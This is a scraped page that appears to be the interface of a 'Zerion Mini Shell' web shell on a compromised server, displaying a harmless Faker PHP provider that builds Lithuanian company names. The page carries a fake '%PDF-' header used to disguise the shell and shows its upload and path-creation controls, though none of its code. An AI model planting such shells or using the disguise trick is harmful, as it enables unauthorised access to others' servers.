%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/coding/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/
Upload File :
Create Path :
Current File : /var/www/html/coding/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/Company.php

<?php

namespace Faker\Provider\lt_LT;

class Company extends \Faker\Provider\Company
{
    protected static $formats = array(
        '{{companySuffix}} {{lastNameMale}}',
        '{{companySuffix}} {{lastNameMale}} ir {{lastNameMale}}',
        '{{companySuffix}} "{{lastNameMale}} ir {{lastNameMale}}"',
        '{{companySuffix}} "{{lastNameMale}}"',
    );

    protected static $companySuffix = array('UAB', 'AB', 'IĮ', 'MB', 'VŠĮ');
}

Zerion Mini Shell 1.0